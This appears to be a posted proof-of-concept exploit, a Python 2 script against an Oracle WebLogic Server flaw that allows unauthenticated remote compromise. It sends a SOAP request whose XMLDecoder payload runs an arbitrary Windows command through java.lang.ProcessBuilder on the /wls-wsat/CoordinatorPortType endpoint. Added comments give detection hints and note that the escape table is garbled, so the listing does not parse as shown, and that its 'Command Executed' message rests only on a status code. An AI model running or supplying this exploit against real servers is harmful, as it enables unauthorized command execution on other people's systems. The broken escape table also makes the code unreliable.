Created
December 28, 2017 02:51
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
# Python 2 script: the code below uses print statements and raw_input.
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences the warning requests emits for calls made with verify=False
# (do_post makes one); the server certificate is not validated on that call.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def payload_command (command_in):
    # Builds the SOAP envelope this proof of concept sends and returns it as
    # one str. The caller's string is wrapped in <string>...</string> and
    # placed as the third element of a java.lang.ProcessBuilder argument array
    # ("cmd", "/c", <command_in>), inside a java.beans.XMLDecoder document
    # carried in the work:WorkContext SOAP header.
    #
    # Detection: every marker worth matching on is a literal in this
    # template -- an XMLDecoder <java> element inside a WorkContext header,
    # with java.lang.ProcessBuilder as the instantiated class. The "cmd", "/c"
    # prefix means the template is written for a Windows host, so a cmd.exe
    # child of the application server's Java process would be the host-side
    # signal to look for.
    #
    # NOTE(review): the replacement values in the table below look like they
    # were entity-decoded by the page renderer. As displayed, each character
    # maps to itself and the '"' entry is not a valid Python literal, so this
    # listing does not parse as shown.
    html_escape_table = {
        "&": "&",
        '"': """,
        "'": "'",
        ">": ">",
        "<": "<",
    }
    # Characters without a table entry pass through unchanged (get(c, c)).
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
        " <soapenv:Header> " \
        " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
        " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
        " <void class=\"java.lang.ProcessBuilder\"> \n" \
        " <array class=\"java.lang.String\" length=\"3\">" \
        " <void index = \"0\"> " \
        " <string>cmd</string> " \
        " </void> " \
        " <void index = \"1\"> " \
        " <string>/c</string> " \
        " </void> " \
        " <void index = \"2\"> " \
        + command_filtered + \
        " </void> " \
        " </array>" \
        " <void method=\"start\"/>" \
        " </void>" \
        " </java>" \
        " </work:WorkContext>" \
        " </soapenv:Header>" \
        " <soapenv:Body/>" \
        "</soapenv:Envelope>"
    return payload_1
def do_post(url_in, command_in):
    # Sends one POST carrying payload_command(command_in) to
    # url_in + "/wls-wsat/CoordinatorPortType" and prints a one-line verdict.
    # Returns None.
    #
    # Defender's view of the request: method POST, Content-Type text/xml,
    # path ending in /wls-wsat/CoordinatorPortType. Requests to that path
    # from untrusted networks are worth alerting on or blocking at the
    # proxy/WAF, alongside applying the vendor's fix for the affected
    # versions.
    payload_url = url_in + "/wls-wsat/CoordinatorPortType"
    payload_header = {'content-type': 'text/xml'}
    # verify=False: the server certificate is not validated for this request.
    # No timeout argument is passed either.
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header,verify=False)
    # The verdict is keyed on the status code alone.
    # NOTE(review): a 500 only shows that the server answered this request
    # with an error. The response body is never read and nothing confirms what
    # happened on the host, so "Command Executed" is an assumption. For log
    # review, a 500 recorded against this path is still worth correlating with
    # process-creation events on the server.
    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"
if __name__ == '__main__':
    # Script entry point (Python 2: raw_input). The command string is read
    # interactively from stdin; the base URL comes from the first command-line
    # argument.
    command_in = raw_input("Eneter your command here: ")
    # sys.argv[1] is read without checking the argument count, so running the
    # script with no argument raises IndexError. The value is passed on as
    # given, with no scheme or host validation.
    url_in = sys.argv[1]
    do_post(url_in, command_in)